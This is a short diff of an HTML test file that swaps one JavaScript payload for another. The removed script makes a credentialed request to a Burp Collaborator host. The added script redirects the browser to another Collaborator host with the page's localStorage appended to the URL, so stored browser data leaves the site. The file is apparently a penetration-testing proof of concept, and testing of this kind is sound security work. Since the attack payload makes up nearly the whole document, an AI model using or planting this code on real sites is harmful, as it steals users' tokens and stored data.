--- a/test3.html
+++ b/test3.html
@@ -1,6 +1,5 @@
-<html><script type="text/javascript">
-var xhr = new XMLHttpRequest();
-xhr.open('GET', 'https://031n3q1gpurkl8qs9x8tg1riz955tu.burpcollaborator.net', true);
-xhr.withCredentials = true;
-xhr.send(null);
-  </script></html>
+<html><
+<script type="text/javascript">
+document.location='https://uighikga4o6e025mornnvv6ce3k18q.burpcollaborator.net?c='+window.localStorage;
+</script>
+</html>
